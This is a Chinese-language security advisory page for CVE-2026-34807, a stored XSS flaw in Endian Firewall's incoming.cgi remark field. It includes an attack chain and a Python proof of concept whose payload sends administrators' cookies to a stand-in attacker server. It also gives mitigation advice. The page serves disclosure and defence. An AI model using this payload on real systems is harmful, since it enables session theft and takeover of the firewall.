IPBUF安全漏洞报告
English
CVE-2026-34807 CVSS 6.4 中危

CVE-2026-34807: Endian Firewall 存储型XSS漏洞

披露日期: 2026-04-02

漏洞信息

漏洞编号
CVE-2026-34807
漏洞类型
存储型跨站脚本攻击 (Stored XSS)
CVSS评分
6.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Endian Firewall

相关标签

CVE-2026-34807XSS存储型XSSEndian FirewallWeb安全中危

漏洞概述

Endian Firewall 3.3.25及更早版本在处理用户输入时存在安全缺陷。攻击者可利用/cgi-bin/incoming.cgi接口中的remark参数注入恶意JavaScript代码。该代码被存储在服务器端,当授权用户访问受影响页面时触发执行,进而窃取敏感信息或进行未授权操作。

技术细节

该漏洞源于Endian Firewall应用程序在处理`/cgi-bin/incoming.cgi`请求时,未对`remark`参数进行充分的输入净化和输出编码。攻击者需先获取低权限账号登录,随后构造包含恶意脚本的Payload并通过HTTP POST提交。系统将此Payload持久化存储。一旦管理员或其他受信任用户浏览包含该注入数据的页面,嵌入的脚本将在其浏览器上下文中运行。利用此漏洞,攻击者可绕过同源策略,窃取Session Cookie、执行钓鱼攻击或通过浏览器API进一步探测内网。

攻击链分析

STEP 1
信息收集
攻击者识别目标为Endian Firewall,并确定版本在3.3.25及以下。
STEP 2
获取凭证
攻击者通过弱口令猜测或社会工程学获取一个低权限用户的登录凭证。
STEP 3
注入Payload
攻击者使用低权限账户登录,向/cgi-bin/incoming.cgi发送包含恶意JS代码的remark参数数据。
STEP 4
持久化与触发
恶意代码被存储在系统数据库中,当管理员或高权限用户查看相关日志或页面时,代码自动执行。
STEP 5
权限提升
利用窃取的管理员Session ID,攻击者接管防火墙控制权,进行进一步的内网渗透。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 # PoC for CVE-2026-34807 import requests def exploit(target, session_cookie): url = f"{target}/cgi-bin/incoming.cgi" # The payload injects a script to steal cookies payload = '<script>fetch("http://attacker-server/?c="+document.cookie)</script>' headers = { "Cookie": f"sid={session_cookie}" } data = { "remark": payload, "source": "192.168.1.100", "destination": "192.168.1.200" } try: r = requests.post(url, data=data, headers=headers, timeout=10) if r.status_code == 200: print("[+] Payload sent successfully. XSS triggered when admin views the remark.") else: print(f"[-] Failed to send payload. Status code: {r.status_code}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = "http://<target-ip>" session_cookie = "<valid_session_id>" exploit(target, session_cookie)

影响范围

Endian Firewall <= 3.3.25

防御指南

临时缓解措施
在官方补丁发布前,建议管理员加强访问控制,仅允许可信IP访问管理界面。同时,在浏览器端禁用JavaScript执行(虽然会影响功能)或使用NoScript等扩展进行防护。建议定期审查系统日志,检查remark字段中是否包含异常的脚本标签。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表